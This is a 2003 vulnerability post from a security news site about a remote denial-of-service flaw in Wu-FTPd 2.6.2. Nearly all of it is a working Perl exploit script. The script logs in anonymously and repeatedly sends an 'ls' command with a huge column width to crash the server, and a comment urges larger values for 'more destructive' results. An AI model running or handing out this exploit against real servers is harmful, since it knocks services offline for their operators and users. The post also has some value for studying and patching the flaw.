Previous articleBack to news listNext article
|
Sponsored links |
Want to become one of our authors and see your work published on ALLSeek.iNFO ?
|
| Wu-FTPd Remote DoS (/bin/ls) |
|---|
Categorie: Vulnerability
Posted: 2003-11-11 by ReCall
Views: 419
Source: Click here
| Current Rating: Not rated
|
|
| Details |
|---|
Summary
A vulnerability in Wu-FTPd allows remote attackers to call the /bin/ls utility with special parameters causing the Wu-FTPd to fail.
Details
Vulnerable systems:
Wu-Ftpd version 2.6.2
Exploit:
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 ";
my $user = "anonymous";
my $pass = "halt@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)
print ":: Trying to connect to target system at: $target...n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
$count--;
}
print "Done!n";
$ftp->quit;
|
| Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=524
|
| User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
|
Previous articleBack to news listNext article
|
